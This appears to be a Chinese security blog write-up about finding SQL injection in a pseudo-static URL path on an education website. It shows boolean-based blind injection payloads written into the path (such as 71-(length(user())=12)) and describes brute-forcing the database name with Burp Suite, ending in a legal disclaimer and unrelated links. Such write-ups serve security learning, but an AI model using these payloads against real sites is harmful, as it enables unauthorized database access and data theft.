漏洞挖掘 | 记一次伪静态页面的SQL注入

前言

最近工作繁忙,许久没有挖洞,打开度娘,凡事随缘,偶米头发~~(⊙﹏⊙)

涉及技能点

  • SQL注入基础原理

  • 盲注常用函数及思路

  • burpsuite基础知识

过程记录

1.发现

在翻阅一EDU站点时,发现路径中带有明显的数字参数

好像与我们平时习惯的xxx.php?id=不同呃

2.尝试注入

按照以往习惯,先用order by探探底,结果翻车了...应该有自定义逻辑在过滤敏感关键词。

继续努力,峰回路转,耶~~~!

构造boolen等式时能够被带入查询语句并显示不同效果

当条件不符合时,71-false=71,显示71.html,无数据

复制代码
http://EDU_SITE/.../..._id/71-false.html

=> SELECT ..FROM .. WHERE ... AND _id=71-false

而当条件符合时,71-true=70,显示70.html,有数据

复制代码
http://EDU_SITE/.../..._id/71-true.html

=> SELECT ..FROM .. WHERE ... AND _id=71-true

3.确定攻击方式,获取数据进行验证

获取用户名长度

复制代码
http://EDU_SITE/.../..._id/71-(length(user())=12).html

=> SELECT ..FROM .. WHERE ... AND _id=71-(length(user())=12)

获取数据库长度

复制代码
http://EDU_SITE/.../..._id/71-(length(database())=6).html

=> SELECT ..FROM .. WHERE ... AND _id=71-(length(database())=6)

尝试用burpsuite的clusterboom模式对database进行爆破

其中参数1 为位数,参数2 为可能出现的字符明文

获得最终database()=db_cms


3.总结

在尝试sql注入的时候,往往过分关注get传参或者post传参而忽略了URL中自带的注入点,有时候一些明显的数字型参数也能够带入payload

多尝试,多总结

祝各位师兄们也都收获满满~~!

更多网络安全优质学习资料与干货教程+

送渗透工具、技术文档、书籍,面试题、视频(基础到进阶。环境搭建,HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等)、应急响应笔记、学习路线。

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

相关推荐
gmaajt14 分钟前
mysql如何检查数据库表是否存在损坏_使用CHECK TABLE命令修复
jvm·数据库·python
IT_陈寒18 分钟前
React状态更新那点事儿,我掉坑里爬了半天
前端·人工智能·后端
cwxcc22 分钟前
Google Core Web Vitals(核心网页指标)
前端·性能优化
heRs BART27 分钟前
【Flask】四、flask连接并操作数据库
数据库·python·flask
Lucifer三思而后行30 分钟前
一次 Oracle RAC 归档告警排查
数据库·oracle
zhuiyisuifeng32 分钟前
PostgreSQL常用时间函数与时间计算提取示例说明
数据库·postgresql
wellc36 分钟前
MySQL Workbench菜单汉化为中文
android·数据库·mysql
|晴 天|38 分钟前
Vue 3 + LocalStorage 实现博客游戏化系统:成就墙、每日签到、积分商城
前端·vue.js·游戏
Irissgwe1 小时前
redis之常见数据类型
数据库·redis·缓存
2301_773553621 小时前
CSS如何对用户访问过的链接进行降级颜色处理_使用-visited伪类改变颜色
jvm·数据库·python